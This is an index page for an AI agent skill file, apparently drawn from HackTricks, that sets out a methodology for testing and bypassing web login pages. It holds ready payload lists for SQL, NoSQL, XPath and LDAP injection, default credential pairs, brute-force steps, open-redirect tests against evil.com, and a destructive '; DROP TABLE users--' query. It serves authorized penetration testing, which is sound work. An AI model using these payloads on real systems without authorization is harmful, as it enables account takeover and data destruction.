OpenSkillIndex← back to search

Hacktricks-skills login-bypass

How to systematically test and bypass web login mechanisms. Use this skill whenever the user mentions login pages, authentication bypass, web security testing, pentesting login forms, credential testing, or any scenario involving web application authentication. This includes SQL injection login bypass, NoSQL injection, XPath injection, LDAP injection, parameter manipulation, and remember me functionality abuse. Trigger this skill for any web security assessment involving authentication.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/login-bypass/login-bypass/SKILL.MD
source content

Login Bypass Testing

A systematic approach to testing and bypassing web login mechanisms during security assessments.

Initial Reconnaissance

When you encounter a login page, perform these checks first:

1. Inspect Page Comments

  • Scroll to the bottom and right of the page
  • View page source for hidden comments
  • Look for developer notes, credentials, or debug information
  • Check for commented-out code that might reveal logic

2. Direct Access Testing

  • Try accessing restricted pages directly without authentication
  • Check common paths: 
    /admin
    , 
    /dashboard
    , 
    /profile
    , 
    /account
  • Modify URL parameters to skip authentication checks
  • Test if session cookies can be forged or omitted

3. Parameter Manipulation

  • Submit the form without any parameters
  • Submit with only one parameter (username OR password)
  • Try empty values for both fields
  • Test with null bytes: 
    username=admin%00&password=test%00

Language-Specific Exploits

PHP Comparison Errors

PHP's loose comparison can be exploited with array parameters:

user[]=a&pwd=b
user=a&pwd[]=b
user[]=a&pwd[]=b

These payloads can cause PHP to compare arrays to strings, potentially bypassing authentication.

Content-Type Manipulation

Change to JSON:

  • Set 
    Content-Type: application/json
  • Send credentials as JSON: 
    {"username": "admin", "password": "test"}
  • Try boolean values: 
    {"username": "admin", "password": true}

JSON in GET Request:

  • If POST is blocked, try GET with JSON body
  • Set 
    Content-Type: application/json
    on GET request
  • Send JSON payload in request body

Node.js Parsing Errors

Node.js mysql libraries can have parsing vulnerabilities:

Array syntax:

password[password]=1

JSON syntax:

{"password": {"password": 1}}

Important: You still need to provide a valid username. The payload transforms to a query where the password condition is always true.

Mitigation: Adding 

"stringifyObjects": true
to mysql.createConnection blocks this.

Credential Testing

Default Credentials

Check default credentials for the technology/platform:

  • Apache: admin/admin, admin/password
  • Tomcat: tomcat/tomcat, admin/admin
  • WordPress: admin/admin, admin/password
  • Joomla: administrator/administrator
  • Drupal: admin/drupal
  • Check vendor documentation for device defaults

Common Combinations

Test these username/password pairs:

  • root / root, root / password, root / admin
  • admin / admin, admin / password, admin / 123456
  • administrator / administrator, administrator / password
  • test / test, user / user, demo / demo
  • Use the technology name as both username and password

Dictionary Attacks

  1. Use Cewl to create a custom dictionary from the target site
  2. Add default usernames and passwords to the dictionary
  3. Brute-force using all words as both usernames and passwords
  4. Consider using Hydra, Burp Intruder, or OWASP ZAP

Injection-Based Bypasses

SQL Injection Authentication Bypass

Common SQL injection payloads for login bypass:

Classic OR-based:

' OR '1'='1
' OR '1'='1' --
' OR '1'='1' #
admin'--
admin'/*
'' OR '1'='1
' OR 1=1 --
' OR ''='

UNION-based:

' UNION SELECT 1,2--
' UNION SELECT NULL,NULL--

Time-based (blind):

' OR SLEEP(5)--
' OR WAITFOR DELAY '0:0:5'--

Stacked queries:

'; DROP TABLE users--
'; SELECT * FROM users--

NoSQL Injection Authentication Bypass

MongoDB and other NoSQL databases can be bypassed with JSON operators:

Basic bypass:

{"username": {"$ne": null}, "password": {"$ne": null}}

Comparison operators:

{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$exists": true}, "password": {"$exists": true}}

Regex bypass:

{"username": {"$regex": ""}, "password": {"$regex": ""}}

$where operator:

{"$where": "true"}

XPath Injection Authentication Bypass

XPath injection payloads for login bypass:

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection Authentication Bypass

LDAP injection payloads:

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Remember Me Functionality

If the page has "Remember Me" functionality:

  1. Check cookie implementation:

    • Is the cookie encrypted or hashed?
    • Can you predict or forge tokens?
    • Are tokens tied to specific user accounts?

  2. Test for account takeover:

    • Try using another user's remember me token
    • Check if tokens are predictable or sequential
    • Test if you can swap tokens between accounts

  3. Check token storage:

    • Are tokens stored in database?
    • Can you enumerate valid tokens?
    • Is there token rotation on login?

Open Redirect Testing

After login, pages often redirect users. Test for open redirects:

  1. Find the redirect parameter:

    • Look for 
      ?redirect=
      , 
      ?return=
      , 
      ?next=
      , 
      ?url=
    • Check POST parameters for redirect URLs

  2. Test redirect manipulation:

    • Change redirect to your controlled domain
    • Try: 
      ?redirect=http://your-evil-site.com
    • Test with 
      //evil.com
      (protocol-relative)
    • Try 
      \evil.com
      (backslash bypass)

  3. Potential impact:

    • Phishing attacks
    • Cookie theft
    • OAuth token theft
    • Session hijacking

Additional Checks

Username Enumeration

  • Check error messages for "user not found" vs "wrong password"
  • Test timing differences between valid/invalid usernames
  • Look for different response sizes or headers
  • Check if account creation reveals valid usernames

Auto-Complete Testing

  • Check if password forms have 
    autocomplete="off"
  • Test if browser auto-fills credentials
  • Look for 
    autocomplete="on"
    or missing attribute
  • Check for autocomplete on sensitive fields

Automatic Tools

HTLogin

  • Tool: HTLogin
  • Purpose: Automated login bypass testing
  • Usage: Scan login forms for common bypass techniques

Other Tools

  • Burp Suite: Intruder for brute-force, Repeater for manual testing
  • OWASP ZAP: Automated scanning and manual testing
  • Hydra: Brute-force attacks on various protocols
  • Medusa: Parallel login brute-forcer

Testing Workflow

  1. Reconnaissance: Inspect page, check comments, view source
  2. Direct Access: Try accessing protected resources without auth
  3. Parameter Testing: Manipulate form parameters
  4. Injection Testing: Try SQL, NoSQL, XPath, LDAP injections
  5. Credential Testing: Default creds, common combinations, brute-force
  6. Functionality Testing: Remember me, redirects, enumeration
  7. Tool-Assisted: Use automated tools for comprehensive testing

Documentation

Document all findings:

  • Which techniques worked
  • Payloads that succeeded
  • Impact of each bypass
  • Remediation recommendations
  • Evidence (screenshots, logs)

Legal Considerations

  • Only test systems you have authorization to test
  • Document authorization before testing
  • Follow responsible disclosure if finding vulnerabilities
  • Respect scope and rules of engagement